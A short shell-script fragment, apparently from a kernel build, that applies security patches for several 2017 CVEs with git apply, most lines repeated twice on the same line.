git apply $cvePatches/CVE-2017-6951/^3.14/0001.patch git apply $cvePatches/CVE-2017-6951/^3.14/0001.patch
git apply $cvePatches/CVE-2017-7187/3.4/0001.patch git apply $cvePatches/CVE-2017-7187/3.4/0001.patch
git apply $cvePatches/CVE-2017-7187/3.4/0003.patch
git apply $cvePatches/CVE-2017-7308/ANY/0003.patch git apply $cvePatches/CVE-2017-7308/ANY/0003.patch
git apply $cvePatches/CVE-2017-7487/ANY/0001.patch git apply $cvePatches/CVE-2017-7487/ANY/0001.patch
git apply $cvePatches/CVE-2017-8246/3.4/0002.patch git apply $cvePatches/CVE-2017-8246/3.4/0002.patch